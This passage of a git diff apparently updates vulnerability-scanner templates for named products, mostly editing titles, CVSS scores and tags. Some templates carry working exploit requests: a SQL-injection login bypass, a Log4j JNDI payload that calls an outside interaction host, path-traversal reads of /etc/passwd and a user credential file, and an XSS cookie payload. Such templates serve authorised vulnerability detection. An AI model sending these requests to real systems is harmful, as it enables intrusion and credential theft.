+  name: Kyocera Command Center RX ECOSYS M2035dn - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Kyocera Command Center RX ECOSYS M2035dn - Unauthenticated arbitrary file retrieval.
+  description: Kyocera Command Center RX ECOSYS M2035dn is vulnerable to unauthenticated local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/50738
     - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
-  tags: printer,iot,kyocera,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: edb,printer,iot,kyocera,lfi
 
 requests:
   - method: GET
@@ -24,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/laravel-filemanager-lfi.yaml b/vulnerabilities/other/laravel-filemanager-lfi.yaml
index d9287c7b90..2780e94725 100644
--- a/vulnerabilities/other/laravel-filemanager-lfi.yaml
+++ b/vulnerabilities/other/laravel-filemanager-lfi.yaml
@@ -4,13 +4,14 @@ info:
   name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
   author: hackerarpan
   severity: high
+  description: UniSharp Larevel File Manager 2.0.0 is vulnerable to arbitrary file read.
   reference:
     - https://www.exploit-db.com/exploits/48166
     - https://github.com/UniSharp/laravel-filemanager
   metadata:
-    google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+    google-query: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
     shodan-query: http.html:"Laravel FileManager"
-  tags: lfi,unisharp,laravel,filemanager,fileupload,lfr
+  tags: lfr,edb,lfi,unisharp,laravel,filemanager,fileupload
 
 requests:
   - method: GET
@@ -27,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/loancms-sqli.yaml b/vulnerabilities/other/loancms-sqli.yaml
new file mode 100644
index 0000000000..b96bac34ca
--- /dev/null
+++ b/vulnerabilities/other/loancms-sqli.yaml
@@ -0,0 +1,43 @@
+id: loancms-sqli
+
+info:
+  name: Loan Management System 1.0 - SQLi Authentication Bypass
+  author: arafatansari
+  severity: high
+  description: |
+    Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/50402
+  metadata:
+    verified: true
+  tags: edb,loancms,sqli,auth-bypass,cms
+
+requests:
+  - raw:
+      - |
+        POST /ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin'+or+'1'%3D'1'%23&password=nuclei
+
+      - |
+        GET /index.php?page=home HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'window.start_load'
+          - 'Welcome back Admin'
+          - 'Loan Management System'
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - 'login-form'
+        negative: true
diff --git a/vulnerabilities/other/lotuscms-rce.yaml b/vulnerabilities/other/lotuscms-rce.yaml
index 3092588555..93e8d24c1c 100644
--- a/vulnerabilities/other/lotuscms-rce.yaml
+++ b/vulnerabilities/other/lotuscms-rce.yaml
@@ -1,11 +1,17 @@
 id: lotuscms-rce
 
 info:
-  name: LotusCMS 3.0 eval() RCE
+  name: LotusCMS 3.0 - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: |
+    LotusCMS 3.0 is susceptible to remote code execution via the Router () function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call and allow remote code execution.
   reference:
     - https://github.com/Hood3dRob1n/LotusCMS-Exploit
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: lotuscms,rce
 
 requests:
@@ -22,10 +28,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "38ee63071a04dc5e04ed22624c38e648"
-        part: body
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/lucee-xss.yaml b/vulnerabilities/other/lucee-xss.yaml
index dea08e0297..dfe6e13eca 100644
--- a/vulnerabilities/other/lucee-xss.yaml
+++ b/vulnerabilities/other/lucee-xss.yaml
@@ -1,11 +1,11 @@
 id: lucee-xss
 
 info:
-  name: Lucee Unauthenticated Reflected XSS
+  name: Lucee Cross-Site Scripting
   author: incogbyte
   severity: medium
   description: A vulnerability in Lucee allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
-  tags: lucee,xss
+  tags: lucee,xss,unauth
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml
index 6993c365f5..720ae3f77d 100644
--- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml
+++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml
@@ -7,7 +7,7 @@ info:
   description: A vulnerability in Luftguitar CMS allows remote unauthenticated users to upload files to the remote service via the 'ftb.imagegallery.aspx' endpoint.
   reference:
     - https://www.exploit-db.com/exploits/14991
-  tags: luftguitar
+  tags: luftguitar,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/maccmsv10-backdoor.yaml b/vulnerabilities/other/maccmsv10-backdoor.yaml
index eaad3100fe..a712f28d33 100644
--- a/vulnerabilities/other/maccmsv10-backdoor.yaml
+++ b/vulnerabilities/other/maccmsv10-backdoor.yaml
@@ -1,11 +1,17 @@
 id: maccmsv10-backdoor
 
 info:
-  name: Maccmsv10 Backdoor
+  name: Maccmsv10 - Backdoor Remote Code Execution
   author: princechaddha
   severity: critical
-  description: A backdoor has been found in Maccmsv10, the backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'.
-  tags: maccmsv10,rce
+  description: Maccmsv10 contains a backdoor which can be exploited by remote attackers. The backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'. Exploitation of this vulnerability will allow remote attackers to execute code.
+  reference:
+    - https://github.com/chaitin/xray/blob/master/pocs/maccmsv10-backdoor.yml
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: maccmsv10,rce,backdoor
 
 requests:
   - method: POST
@@ -18,12 +24,15 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "扫描后门"
           - "反弹端口"
           - "文件管理"
         condition: and
-        part: body
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/magicflow-lfi.yaml b/vulnerabilities/other/magicflow-lfi.yaml
index 31412a5435..2c736182ae 100644
--- a/vulnerabilities/other/magicflow-lfi.yaml
+++ b/vulnerabilities/other/magicflow-lfi.yaml
@@ -3,10 +3,15 @@ id: magicflow-lfi
 info:
   name: MagicFlow - Local File Inclusion
   author: gy741
-  severity: critical
-  description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
+  severity: high
+  description: |
+    MagicFlow is susceptible to local file inclusion vulnerabilities because it allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
   reference:
     - https://www.seebug.org/vuldb/ssvid-89258
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-22
   tags: magicflow,lfi
 
 requests:
@@ -19,9 +24,12 @@ requests:
     matchers:
 
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml
index 1b441eeeef..34a59fa4c1 100644
--- a/vulnerabilities/other/mcafee-epo-rce.yaml
+++ b/vulnerabilities/other/mcafee-epo-rce.yaml
@@ -1,19 +1,14 @@
 id: mcafee-epo-rce
 
 info:
-  name: McAfee ePolicy Orchestrator RCE
+  name: McAfee ePolicy Orchestrator - Arbitrary File Upload
   author: dwisiswant0
   severity: high
   description: |
-    A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO)
-    is a type of Path Traversal occurring when archives are unpacked
-    if the names of the packed files are not properly sanitized.
-    An attacker can create archives with files containing "../" in their names,
-    making it possible to upload arbitrary files
-    to arbitrary directories or overwrite existing ones during archive extraction.
+    McAfee ePolicy Orchestrator (ePO) is vulnerable to a ZipSlip vulnerability which allows arbitrary file upload when archives are unpacked if the names of the packed files are not properly sanitized. An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction.
   reference:
     - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
-  tags: mcafee,rce
+  tags: mcafee,rce,
 
 requests:
   - method: GET
@@ -31,4 +26,6 @@ requests:
       - type: regex
         regex:
           - "Volume (in drive [A-Z]|Serial Number) is"
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/metabase-log4j.yaml b/vulnerabilities/other/metabase-log4j.yaml
new file mode 100644
index 0000000000..a227455d80
--- /dev/null
+++ b/vulnerabilities/other/metabase-log4j.yaml
@@ -0,0 +1,43 @@
+id: metabase-log4j
+
+info:
+  name: Metabase - Remote Code Execution (Apache Log4j)
+  author: DhiyaneshDK
+  severity: critical
+  description: The vulnerability exists due to incomplete patch in Apache Log4j 2.15.0 for a code injection vulnerability VU58816 (CVE-2021-44228) in certain non-default configurations. A remote attacker with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) can pass malicious data using a JNDI Lookup pattern and perform a denial of service (DoS) attack, exfiltrate data or execute arbitrary code.
+  reference:
+    - https://www.cybersecurity-help.cz/vdb/SB2021121706
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: title:"Metabase"
+  tags: cve,cve2021,rce,jndi,log4j,metabase
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml
index 4628dea9d4..e9e4128852 100644
--- a/vulnerabilities/other/metinfo-lfi.yaml
+++ b/vulnerabilities/other/metinfo-lfi.yaml
@@ -1,12 +1,16 @@
 id: metinfo-lfi
 
 info:
-  name: MetInfo 6.0.0/6.1.0 LFI
+  name: MetInfo <=6.1.0 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content.
+  description: MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content.
   reference:
     - https://paper.seebug.org/676/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: metinfo,lfi
 
 requests:
@@ -30,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/mida-eframework-xss.yaml b/vulnerabilities/other/mida-eframework-xss.yaml
index 93bffe41df..bdfb28cfe4 100644
--- a/vulnerabilities/other/mida-eframework-xss.yaml
+++ b/vulnerabilities/other/mida-eframework-xss.yaml
@@ -1,7 +1,7 @@
 id: mida-eframework-xss
 
 info:
-  name: Mida eFramework - Cross Site Scripting
+  name: Mida eFramework - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   tags: mida,xss
@@ -24,4 +24,4 @@ requests:
 
       - type: word
         words:
-          - '"><script>javascript:alert(document.cookie)</script>'
\ No newline at end of file
+          - '"><script>javascript:alert(document.cookie)</script>'
diff --git a/vulnerabilities/other/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml
index 4164b1a4cf..d87d854641 100644
--- a/vulnerabilities/other/minimouse-lfi.yaml
+++ b/vulnerabilities/other/minimouse-lfi.yaml
@@ -1,13 +1,17 @@
 id: minimouse-lfi
 
 info:
-  name: Mini Mouse 9.2.0 - Path Traversal
+  name: Mini Mouse 9.2.0 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: A vulnerability in Mini Mouse allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
+  description: Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
   reference:
     - https://www.exploit-db.com/exploits/49744
-  tags: minimouse,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,edb,minimouse
 
 requests:
   - method: GET
@@ -27,3 +31,5 @@ requests:
           - "extensions"
         condition: and
         part: body
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml
index f0aa5c374c..82ddc28935 100644
--- a/vulnerabilities/other/mirai-unknown-rce.yaml
+++ b/vulnerabilities/other/mirai-unknown-rce.yaml
@@ -1,12 +1,17 @@
 id: mirai-unknown-rce
 
 info:
-  name: Mirai Unknown - Remote Code Execution
+  name: Mirai - Remote Command Injection
   author: gy741
   severity: critical
-  description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection.
+  description: |
+    Mirai is susceptible to an unknown exploit that targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection vulnerability.
   reference:
     - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: mirai,rce,oast
 
 requests:
@@ -23,3 +28,5 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/mpsec-lfi.yaml b/vulnerabilities/other/mpsec-lfi.yaml
index 1bf2038934..962532b775 100644
--- a/vulnerabilities/other/mpsec-lfi.yaml
+++ b/vulnerabilities/other/mpsec-lfi.yaml
@@ -1,11 +1,16 @@
 id: mpsec-lfi
 
 info:
-  name: MPSec ISG1000 Local File Read
+  name: MPSec ISG1000 - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: MPSec ISG1000 is vulnerable to local file inclusion.
   reference:
     - https://twitter.com/sec715/status/1402884871173795842
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: mpsec,lfi
 
 requests:
@@ -30,4 +35,6 @@ requests:
       - type: word
         words:
           - "text/plain"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
index c4cbfa7b17..f5ab52aee4 100644
--- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
+++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
@@ -1,12 +1,13 @@
 id: ms-exchange-server-reflected-xss
 
 info:
-  name: MS Exchange Server XSS
+  name: MS Exchange Server Cross-Site Scripting
   author: infosecsanyam
   severity: medium
   reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Outlook%22
     - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
+  metadata:
+    shodan-query: http.title:"Outlook"
   tags: microsoft,exchange,owa,xss
 
 requests:
diff --git a/vulnerabilities/other/myucms-lfr.yaml b/vulnerabilities/other/myucms-lfr.yaml
index 327a403ef9..84cfa96cf3 100644
--- a/vulnerabilities/other/myucms-lfr.yaml
+++ b/vulnerabilities/other/myucms-lfr.yaml
@@ -1,11 +1,16 @@
 id: myucms-lfr
 
 info:
-  name: MyuCMS Local File Read
+  name: MyuCMS - Local File Inclusion
   author: princechaddha
   severity: high
+  description: MyuCMS is vulnerable to local file inclusion.
   reference:
     - https://blog.csdn.net/yalecaltech/article/details/104908257
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: myucms,lfi
 
 requests:
@@ -16,3 +21,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/natshell-path-traversal.yaml b/vulnerabilities/other/natshell-path-traversal.yaml
index 629dd6eec9..89e7d49d20 100644
--- a/vulnerabilities/other/natshell-path-traversal.yaml
+++ b/vulnerabilities/other/natshell-path-traversal.yaml
@@ -1,11 +1,16 @@
 id: natshell-path-traversal
 
 info:
-  name: NatShell Path Traversal
+  name: NatShell - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: NatShell is vulnerable to local file inclusion.
   reference:
     - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   metadata:
     fofa-query: title="蓝海卓越计费管理系统"
   tags: natshell,lfi
@@ -25,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/natshell-rce.yaml b/vulnerabilities/other/natshell-rce.yaml
index 389048e371..cb2c801d39 100644
--- a/vulnerabilities/other/natshell-rce.yaml
+++ b/vulnerabilities/other/natshell-rce.yaml
@@ -1,11 +1,17 @@
 id: natshell-rce
 
 info:
-  name: NatShell Debug File RCE
+  name: NatShell Debug File - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: |
+    The NatShell debug file is susceptible to a remote code execution vulnerability.
   reference:
     - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: natshell,rce
 
 requests:
@@ -19,9 +25,12 @@ requests:
     matchers:
 
       - type: regex
+        part: body
         regex:
           - "toor:[x*]:0:0"
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/netgear-router-exposure.yaml b/vulnerabilities/other/netgear-router-exposure.yaml
index cafcc346b8..4b69bfe16c 100644
--- a/vulnerabilities/other/netgear-router-exposure.yaml
+++ b/vulnerabilities/other/netgear-router-exposure.yaml
@@ -1,14 +1,18 @@
 id: netgear-router-exposure
 
 info:
-  name: NETGEAR Router S/N Disclosure
+  name: NETGEAR Routers - Serial Number Disclosure
   author: geeknik
-  severity: critical
-  description: Multiple NETGEAR router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled.
+  severity: medium
+  description: |
+    Multiple NETGEAR router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled.
   reference:
     - https://www.exploit-db.com/exploits/47117
-    - https://www.exploit-db.com/exploits/45741
-  tags: netgear,exposure,iot,router
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-200
+  tags: edb,netgear,exposure,iot,router
 
 requests:
   - method: GET
@@ -40,3 +44,5 @@ requests:
         group: 1
         regex:
           - "<serialNumber>([A-Z0-9]+)<\\/serialNumber>"
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml
index dfe9ded8c3..843fffc6d9 100644
--- a/vulnerabilities/other/netis-info-leak.yaml
+++ b/vulnerabilities/other/netis-info-leak.yaml
@@ -7,7 +7,7 @@ info:
   description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.
   reference:
     - https://www.exploit-db.com/exploits/48384
-  tags: netis,exposure
+  tags: netis,exposure,edb
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
index efc4f25bce..221fba80c2 100644
--- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
+++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
@@ -1,13 +1,17 @@
 id: nginx-merge-slashes-path-traversal
 
 info:
-  name: Nginx Merge Slashes Path Traversal
+  name: Nginx Server - Local File Inclusion
   author: dhiyaneshDk
-  severity: medium
-  description: A vulnerability in the remote Nginx server could cause the server to merge slashslash together causing what should have protected the web site from a directory traversal vulnerability into a vulnerable server.
+  severity: high
+  description: Nginx server is vulnerable to local file inclusion.
   reference:
     - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
     - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: exposure,config,lfi,nginx
 
 requests:
@@ -31,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml
index a18b450540..6e08643708 100644
--- a/vulnerabilities/other/ns-asg-file-read.yaml
+++ b/vulnerabilities/other/ns-asg-file-read.yaml
@@ -1,15 +1,20 @@
 id: nsasg-arbitrary-file-read
 
 info:
-  name: NS ASG Arbitrary File Read
+  name: NS ASG - Local File Inclusion
   author: pikpikcu,ritikchaddha
   severity: high
+  description: NS ASG is vulnerable to local file inclusion.
   reference:
     - https://zhuanlan.zhihu.com/p/368054963
     - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md
   metadata:
     fofa-query: app="网康科技-NS-ASG安全网关"
     shodan-query: http.title:“NS-ASG”
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: nsasg,lfi
 
 requests:
@@ -31,3 +36,5 @@ requests:
           - "$certfile"
           - "application/pdf"
         condition: and
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/nuuo-file-inclusion.yaml b/vulnerabilities/other/nuuo-file-inclusion.yaml
index f577991d4f..6d7ed08d02 100644
--- a/vulnerabilities/other/nuuo-file-inclusion.yaml
+++ b/vulnerabilities/other/nuuo-file-inclusion.yaml
@@ -1,12 +1,17 @@
 id: nuuo-file-inclusion
 
 info:
-  name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval
+  name: NUUO NVRmini 2 3.0.8 - Local File Inclusion
   author: princechaddha
   severity: high
+  description: NUUO NVRmini 2 3.0.8 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/40211
-  tags: nuuo,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,edb,nuuo
 
 requests:
   - method: GET
@@ -28,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
index 8f142eba45..e0f40d5061 100644
--- a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
+++ b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
@@ -4,11 +4,17 @@ info:
   name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
   author: berkdusunur
   severity: critical
+  description: |
+    NUUO NVRmini 2 3.0.8 is susceptible to remote code execution.
   reference:
     - https://www.exploit-db.com/exploits/45070
     - https://github.com/berkdsnr/NUUO-NVRMINI-RCE
     - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
-  tags: rce,nuuo
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: rce,nuuo,nvrmini,edb,packetstorm
 
 requests:
   - method: GET
@@ -18,10 +24,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "/upload_tmp_dir/"
-        part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/odoo-cms-redirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml
index 3fecc9364a..431683a7c5 100644
--- a/vulnerabilities/other/odoo-cms-redirect.yaml
+++ b/vulnerabilities/other/odoo-cms-redirect.yaml
@@ -13,10 +13,10 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/website/lang/en_US?r=https://example.com/"
+      - "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/vulnerabilities/other/oliver-library-lfi.yaml b/vulnerabilities/other/oliver-library-lfi.yaml
index 4d3eaf3db1..84bd572c14 100644
--- a/vulnerabilities/other/oliver-library-lfi.yaml
+++ b/vulnerabilities/other/oliver-library-lfi.yaml
@@ -1,14 +1,18 @@
 id: oliver-library-lfi
 
 info:
-  name: Oliver Library Server v5 <8.00.008.053 - Arbitrary File Retrieval
+  name: Oliver 5 Library Server <8.00.008.053 - Local File Inclusion
   author: gy741
   severity: high
-  description: An arbitrary file retrieval vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file retrieval by an attacker using unsanitized user supplied input.
+  description: Oliver 5 Library Server versions prior to 8.00.008.053 are vulnerable to local file inclusion via the FileServlet function.
   reference:
     - https://www.exploit-db.com/exploits/50599
     - https://www.softlinkint.com/product/oliver/
-  tags: windows,lfi,oliver
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,oliver,edb,windows
 
 requests:
   - method: GET
@@ -23,3 +27,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/omnia-mpx-lfi.yaml b/vulnerabilities/other/omnia-mpx-lfi.yaml
new file mode 100644
index 0000000000..99b9dd2b1a
--- /dev/null
+++ b/vulnerabilities/other/omnia-mpx-lfi.yaml
@@ -0,0 +1,36 @@
+id: omnia-mpx-lfi
+
+info:
+  name: Omnia MPX 1.5.0+r1 - Path Traversal
+  author: arafatansari,ritikchaddha
+  severity: high
+  description: |
+    Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
+  reference:
+    - https://www.exploit-db.com/exploits/50996
+  metadata:
+    verified: true
+    shodan-query: http.html:"Omnia MPX"
+  tags: mpx,traversal,edb,lfi,omnia
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: word
+        part: body
+        words:
+          - '"username":'
+          - '"password":'
+          - '"mustChangePwd":'
+          - '"roleUser":'
+        condition: and
diff --git a/vulnerabilities/other/onlinefarm-management-xss.yaml b/vulnerabilities/other/onlinefarm-management-xss.yaml
new file mode 100644
index 0000000000..6fb3c4ce2e
--- /dev/null
+++ b/vulnerabilities/other/onlinefarm-management-xss.yaml
@@ -0,0 +1,40 @@
+id: onlinefarm-management-xss
+
